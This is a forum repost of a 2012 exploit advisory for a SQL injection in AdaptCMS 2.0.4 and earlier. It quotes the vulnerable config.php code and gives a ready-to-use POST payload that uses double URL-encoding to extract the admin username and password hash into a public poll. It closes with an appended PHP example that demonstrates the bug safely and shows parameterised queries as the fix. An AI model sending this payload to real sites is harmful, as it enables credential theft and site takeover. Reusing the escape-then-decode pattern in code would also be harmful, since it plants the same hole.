Praetorian503 Posted February 3, 2013

AdaptCMS versions 2.0.4 and below suffer from a remote SQL injection vulnerability.

# Exploit Title: AdaptCMS <= 2.0.4 SQL Injection vulnerability
# Date: 26/10/2012
# Exploit Author: Kallimero
# Vendor Homepage: http://www.adaptcms.com/
# Software Link: http://www.insanevisions.com/page/3/Downloads/
# Version: 2.0.4
# Tested on: Debian

Introduction
============

As you know, I love fun and tricky SQL injections. AdaptCMS is vulnerable to a really unusual one.

The vuln
========

First let's see the code:

---------------[config.php]---------------
Line 34:

array_map('clean', $_POST);
---------------[config.php]---------------

clean() acts like addslashes(). But a couple of lines after:

---------------[config.php]---------------
Line 111:

mysql_query("INSERT INTO ".$pre."polls VALUES (null,'".htmlentities(check($vote[2]))."', '".$vote2."', 'custom_option', '','".htmlentities(urldecode($_POST['question']))."', 1, '".time()."')");
---------------[config.php]---------------

w00t, an SQL injection. $_POST['question'] is urldecoded after the superglobal's clean. That's why we can easily inject our SQL request. (Without ENT_QUOTES, the single quote passes through htmlentities().)

The PoC
=======

Ok, now we have to add a second INSERT query, to insert a custom choice in the poll, which obviously contains the admin credentials.

A simple POST HTTP request such as:

article_id=0&poll_id=1&vote=2&custom=1&question=%2527, 1, 1350677660),(null, 0, (select concat(username, 0x3a, password) from adapt_users),'option', '', 1, 1337, 1349597648 )-- -

Now check the homepage, and enjoy the admin credentials.

How to Fix?
===========

There are many SQL injections in this CMS ($_SERVER vars are vulnerable as well), and other funky vulnz. Changing your CMS seems appropriate until they fix those issues.

Thanks
======

All hwc members: Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0, gr4ph0s.

Please visit: http://www.orgasm.re/

Source: PacketStorm
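The ordering bug described under "The vuln", as an added example that is not AdaptCMS's own code: it reproduces escape-then-decode against a harmless constructed input, checks whether an unescaped quote reached the query text, and shows the two defensive orders (decode before escaping, and better, binding the value as a PDO parameter). The clean() stand-in, the helper names and the polls table shape are assumptions.

```php
<?php
// Added example, not AdaptCMS code. clean() and the helper names are
// hypothetical stand-ins; the advisory only says clean() acts like addslashes().

function clean(string $v): string { return addslashes($v); }

// The vulnerable order from config.php: escape the superglobal, then urldecode()
// the value, then htmlentities() with ENT_COMPAT (the pre-PHP-8.1 default, which
// leaves single quotes alone). $post models $_POST, which PHP has already
// URL-decoded once, so a body containing "%2527" arrives here as "%27".
function vulnerable_value(array $post): string {
    $post = array_map('clean', $post);
    return htmlentities(urldecode($post['question']), ENT_COMPAT);
}

// Same steps in the safe order: decode first, then escape. Any quote the
// decode reveals is now seen by addslashes().
function escaped_after_decode(array $post): string {
    return addslashes(urldecode($post['question']));
}

// True if an unescaped single quote is present, i.e. the value would close a
// single-quoted SQL literal when concatenated into a query string.
function breaks_quoted_literal(string $v): bool {
    return preg_match("/(?<!\\\\)'/", $v) === 1;
}

// The real fix: never concatenate at all. The decoded value is bound as a
// parameter, so quotes are data regardless of what escaping ran before.
function insert_poll_question(PDO $db, string $question): void {
    $stmt = $db->prepare('INSERT INTO polls (question) VALUES (?)');
    $stmt->execute([$question]);
}

// Constructed sample: "%27" (a quote hidden from addslashes) plus harmless text.
$post = ['question' => '%27 harmless demo'];

var_dump(breaks_quoted_literal(vulnerable_value($post)));     // quote appears only after escaping
var_dump(breaks_quoted_literal(escaped_after_decode($post))); // escaping now covers the quote

$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE polls (id INTEGER PRIMARY KEY, question TEXT)');
insert_poll_question($db, urldecode($post['question']));
var_dump($db->query('SELECT question FROM polls')->fetchColumn());
```

Run it with the PHP CLI (the PDO sqlite driver is needed for the last part); the stored row holds the literal quote as data, which is the behaviour a parameterised insert guarantees.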